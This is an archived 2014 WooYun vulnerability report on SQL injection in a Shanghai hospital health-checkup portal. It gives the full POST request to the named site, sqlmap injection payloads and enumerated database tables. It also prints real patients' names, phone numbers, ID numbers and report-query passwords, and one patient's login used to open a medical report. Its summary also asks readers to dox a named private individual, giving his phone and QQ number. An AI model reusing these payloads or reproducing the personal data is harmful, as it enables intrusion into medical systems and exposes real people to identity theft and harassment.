当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082940

漏洞标题:上海市某医院体检站漏洞泄露大量体检报告(包括个人资料、身体状况等)系列二

相关厂商:上海市某医院

漏洞作者: 小饼仔

提交时间:2014-11-12 11:36

修复时间:2014-12-27 11:38

公开时间:2014-12-27 11:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-12: 细节已通知厂商并且等待厂商处理中
2014-11-14: 厂商已经确认,细节仅向厂商公开
2014-11-24: 细节向核心白帽子及相关领域专家公开
2014-12-04: 细节向普通白帽子公开
2014-12-14: 细节向实习白帽子公开
2014-12-27: 细节向公众公开

简要描述:

个人信息泄露 之 体检中心系列 第二发
数据量:15W+用户信息,几百万科室体检结果
泄露用户信息有姓名、性别、身份证号、联系电话、社保卡号、邮箱、卡号、查询密码等
并可查询下载、体检报告
PS. 帮一个妹子朋友,求人肉个骗子 骗子信息 电话号码:13918792971(上海) QQ: 94478959 王小新,此人租房不退押金,人跑了,打电话不接,妹子很伤心,在此感谢各位帮忙~

详细说明:

第二发,求上首页~
信息:
上海市普陀区中心医院健康体检站 :报告查询
链接:http://www.sptdch.cn:8080/happy/reportsearch.asp

111.jpg


注入点:
查询处POST注入,验证码不会过期(审核验证时请重新拦截请求,防止验证码因时间过长而失效)

POST /happy/chkuser.asp HTTP/1.1
Host: www.sptdch.cn:8080
Proxy-Connection: keep-alive
Content-Length: 111
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.sptdch.cn:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://www.sptdch.cn:8080/happy/reportsearch.asp
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: ASPSESSIONIDQAARBRAD=OJENGDGBANONCGDNGGLBFOAL
RA-Ver: 2.7.1
RA-Sid: 65E7C870-20141014-044958-a23ba1-b78bcc
seltype=0&userid=aaaa&username=aaa&password=aaa&CheckCode=6192&log_s=%E6%9F%A5%E8%AF%A2&action=user&utype=login

漏洞证明:

SQLMAP:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: userid
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: seltype=0&userid=aaaa' AND 4181=CONVERT(INT,(SELECT CHAR(113)+CHAR(121)+CHAR(121)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (4181=4181) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(99)+CHAR(112)+CHAR(113))) AND 'ClHU'='ClHU&username=aaa&password=aaa&CheckCode=6192&log_s=%E6%9F%A5%E8%AF%A2&action=user&utype=login
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: seltype=0&userid=aaaa'; WAITFOR DELAY '0:0:5'--&username=aaa&password=aaa&CheckCode=6192&log_s=%E6%9F%A5%E8%AF%A2&action=user&utype=login
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: seltype=0&userid=-6916' OR 4210=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'hRJv'='hRJv&username=aaa&password=aaa&CheckCode=6192&log_s=%E6%9F%A5%E8%AF%A2&action=user&utype=login
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
current database:    'web'
current user is DBA:    True
available databases [8]:
[*] jzcis
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] web
Database: web
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| dbo.HYB                 | 3599570 |
| dbo.NKB                 | 977613  |
| dbo.WKB                 | 894409  |
| dbo.YKB                 | 584752  |
| dbo.EBHB                | 427197  |
| dbo.KQB                 | 376879  |
| dbo.XYB                 | 198053  |
| dbo.DXB                 | 168776  |
| dbo.FKB                 | 163860  |
| dbo.JCXX                | 127943  |
| dbo.USB                 | 119766  |
| dbo.XDB                 | 107253  |
| dbo.JLB                 | 104837  |
| dbo.BLB                 | 35242   |
| dbo.zk_WebYH            | 34252   |
| dbo.ELB                 | 30023   |
| dbo.FZ_JCSFXM           | 21101   |
| dbo.CTB                 | 10788   |
省略...
+-------------------------+---------+


表名以B结尾的是不同科室的检查结果,加起来几百万
表dbo.JCXX为体检用户信息,数据量127943,表结构如下,一百多个字段

Database: web
Table: JCXX
[119 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| BorthAddress    | varchar  |
| CARD            | varchar  |
| CKDate          | datetime |
| Class1_ID       | varchar  |
| Class1_R        | varchar  |
| Class2_ID       | varchar  |
| Class2_R        | varchar  |
| Class3_ID       | varchar  |
| Class3_R        | varchar  |
| Clinic_No       | varchar  |
| Contract_ID     | varchar  |
| Count_Flag      | varchar  |
| Count_Flag_Date | datetime |
| Count_Status    | varchar  |
| CSNY            | datetime |
| CYRQ            | datetime |
| DJCount         | int      |
| DJJE            | money    |
| DJModi          | varchar  |
| DJXM            | text     |
| DJYS            | varchar  |
| DWDM            | varchar  |
| DWFZDM          | varchar  |
| Email           | varchar  |
| ETDate          | datetime |
| GB              | varchar  |
| GH              | varchar  |
| GRDNH           | varchar  |
| GWDM            | varchar  |
| GZDM            | varchar  |
| GZKS            | text     |
| HF              | varchar  |
| HISGroupSFID    | varchar  |
| HisTFBJ         | varchar  |
| Hosptial_No     | varchar  |
| HSDate          | datetime |
| HSYS            | varchar  |
| HYXM            | text     |
| ID              | varchar  |
| IFSend          | varchar  |
| IFUpDown        | varchar  |
| InsureSeriesID  | varchar  |
| JCLB            | varchar  |
| JCRQ            | datetime |
| JCXM            | text     |
| JDRQ            | datetime |
| JE              | money    |
| JLYS            | varchar  |
| JZSFFS          | varchar  |
| LastModiDate    | datetime |
| LastModiYS      | varchar  |
| LXDH            | varchar  |
| Medical_No      | varchar  |
| MZ              | varchar  |
| NEWDJXM         | text     |
| Notices         | varchar  |
| NOWJE           | money    |
| NOWSSJE         | money    |
| OperaID         | varchar  |
| PACS_EIS        | varchar  |
| PACSXM          | text     |
| PassWord        | varchar  |
| PHOTO           | image    |
| PntBarCode      | int      |
| PntBarCodeTime  | datetime |
| PrintCount      | int      |
| PrintDate       | datetime |
| PrintYS         | varchar  |
| QUEUEID         | varchar  |
| RCardDate       | datetime |
| RCardFlag       | varchar  |
| ReCall          | varchar  |
| SendWhere       | varchar  |
| SFBJ            | varchar  |
| SFYS            | varchar  |
| SFZH            | varchar  |
| SpecialFlag     | varchar  |
| SQYS            | varchar  |
| SSJE            | money    |
| SSQX            | varchar  |
| SSSS            | varchar  |
| TJFB            | varchar  |
| TXDZ            | varchar  |
| updateState     | varchar  |
| updatesuccess   | varchar  |
| updatetime      | varchar  |
| UpDownTime      | datetime |
| VIPID           | varchar  |
| WCKS            | text     |
| WCXM            | text     |
| WHCD            | varchar  |
| XB              | varchar  |
| XFXM            | text     |
| XJJE            | money    |
| XJJE1           | money    |
| XJJE10          | money    |
| XJJE11          | money    |
| XJJE12          | money    |
| XJJE13          | money    |
| XJJE14          | money    |
| XJJE15          | money    |
| XJJE2           | money    |
| XJJE3           | money    |
| XJJE4           | money    |
| XJJE5           | money    |
| XJJE6           | money    |
| XJJE7           | money    |
| XJJE8           | money    |
| XJJE9           | money    |
| XM              | varchar  |
| YCXM            | text     |
| YSFBJ           | varchar  |
| ZHXMDM          | varchar  |
| ZJDCRQ          | datetime |
| ZJDCYS          | varchar  |
| ZJE             | money    |
| ZJHM            | varchar  |
| ZKL             | float    |
| ZY              | varchar  |
+-----------------+----------+
泄露信息有姓名、性别、身份证号、联系电话、社保卡号、邮箱、卡号等等
部分字段举例:
ID	InsureSeriesID	XM	XB	CSNY	LXDH	GZDM	SFZH	Email	PassWord	BorthAddress	CARD	ZJHM
6212270069	<blank>	汤俊杰	男	12 16 1982 12:00AM	13564318757	<blank>	310101198212162000	NULL	767793	NULL	NULL	NULL
6212270090	<blank>	李美龄	女	02 19 1986 12:00AM	13761455739	<blank>	610402198602190000	NULL	170674	NULL	NULL	NULL
6212270117	<blank>	陈丽敏	女	10 10 1962 12:00AM	13901995775	<blank>	310102196210104000	NULL	539905	NULL	NULL	NULL
6301040003	<blank>	施丽丹	女	06  7 1983 12:00AM	13816434968	<blank>	320684198306071000	NULL	349404	NULL	NULL	NULL
6301040004	<blank>	张伊文	女	08 15 1988 12:00AM	15601971041	<blank>	310107198808154000	NULL	972614	NULL	NULL	NULL
6301040005	<blank>	卢辉明	男	11  1 1976 12:00AM	13818453805	<blank>	410711197611011000	NULL	157815	NULL	NULL	NULL
6301040006	<blank>	商思军	男	12 10 1968 12:00AM	13564399121	<blank>	310107196812101000	NULL	727907	NULL	NULL	NULL
6301040007	<blank>	张丽娟	女	03 14 1991 12:00AM	15216861664	<blank>	340321199103141000	NULL	941975	NULL	NULL	NULL
6301040008	<blank>	王如臣	男	10 17 1975 12:00AM	15618880755	<blank>	41080320130104100000	NULL	447505	NULL	NULL	NULL


登陆页面出查询所需信息为体检号、姓名、查询密码对应字段ID、XM、PASSWORD
这里举一个例子证明
6212270069 汤俊杰 767793

222.jpg


可查询、下载体检报告

111111.jpg


以一个人一份体检报告,至少有12W+,如果一人两份,则是24W+
还有一个表zk_WebYH为web预约用户信息,记录数34252,可以登陆,里面有身份证号等信息,这里就不列了
两个合起来就有15W+的用户

修复方案:

过滤

版权声明:转载请注明来源 小饼仔@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2014-11-14 17:43

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2014-12-27 11:40 | Ch丶0nly ( 普通白帽子 | Rank:205 漏洞数:50 | 专注网络30年。)

    别人提及的都是 几百万起 太少拿不出手